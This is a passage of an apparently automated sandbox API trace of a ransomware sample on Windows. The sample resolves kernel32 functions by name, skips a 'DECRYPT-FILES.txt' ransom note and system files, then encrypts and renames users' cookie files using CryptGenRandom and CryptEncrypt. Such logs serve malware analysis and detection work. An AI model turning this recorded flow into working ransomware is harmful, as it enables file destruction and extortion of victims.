returned="CreateThreadpoolWait" [0181.534] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.534] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.534] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.534] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.534] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.534] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.534] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.535] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.535] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.535] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.535] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.535] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.535] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.535] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.535] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.535] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.535] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.535] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.535] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.535] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.535] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.535] lstrlenA (lpString="DELETEATOM") returned 10 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.535] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.535] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.535] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.535] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.536] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.536] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.536] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.536] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.536] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.536] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.536] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.536] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.536] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.536] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.536] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.536] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.536] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.536] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.536] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.536] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.536] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.536] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.537] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.537] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.537] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.537] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.537] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.537] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.537] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.537] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.537] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.537] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.537] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.537] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.537] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.537] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.537] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.537] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.537] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.537] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.538] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.538] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.538] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.538] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.538] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.538] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.538] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.538] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur") returned 119 [0181.538] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur.XPWkW") returned 125 [0181.538] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6ur"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6Ur.XPWkW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt.az6ur.xpwkw"), dwFlags=0x0) returned 1 [0181.539] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.539] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.539] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.539] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2a0770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf7d5790, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xab5745a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", cAlternateFileName="5P5NRG~1.QAW")) returned 1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="DECRYPT-FILES.txt") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="autorun.inf") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="boot.ini") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="desktop.ini") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="ntuser.dat") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="iconcache.db") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="bootsect.bak") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="ntuser.dat.log") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="thumbs.db") returned -1 [0181.540] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn", lpString2="Bootfont.bin") returned -1 [0181.540] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn") returned 41 [0181.540] lstrcmpiW (lpString1="qawmOn", lpString2="lnk") returned 1 [0181.540] lstrcmpiW (lpString1="qawmOn", lpString2="exe") returned 1 [0181.540] lstrcmpiW (lpString1="qawmOn", lpString2="sys") returned -1 [0181.540] lstrcmpiW (lpString1="qawmOn", lpString2="dll") returned 1 [0181.540] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.540] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn") returned 41 [0181.540] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn" [0181.540] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.541] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=498) returned 1 [0181.541] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.546] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.546] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.546] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.546] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.547] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.547] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.548] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.548] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.548] CloseHandle (hObject=0x288) returned 1 [0181.548] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.548] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.549] CloseHandle (hObject=0x0) returned 0 [0181.549] CloseHandle (hObject=0x284) returned 1 [0181.549] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.549] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.550] GetTickCount () returned 0x1134c7b [0181.550] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.550] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.550] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.550] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.550] lstrlenA (lpString="kernel32.dll") returned 12 [0181.550] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.551] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.551] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.551] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.551] lstrlenA (lpString="ADDATOMA") returned 8 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.551] lstrlenA (lpString="ADDATOMW") returned 8 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.551] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.551] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.551] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.551] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.551] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.551] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.551] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.551] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.551] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.551] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.551] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.551] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.551] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.552] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.552] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.552] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.552] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.552] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") 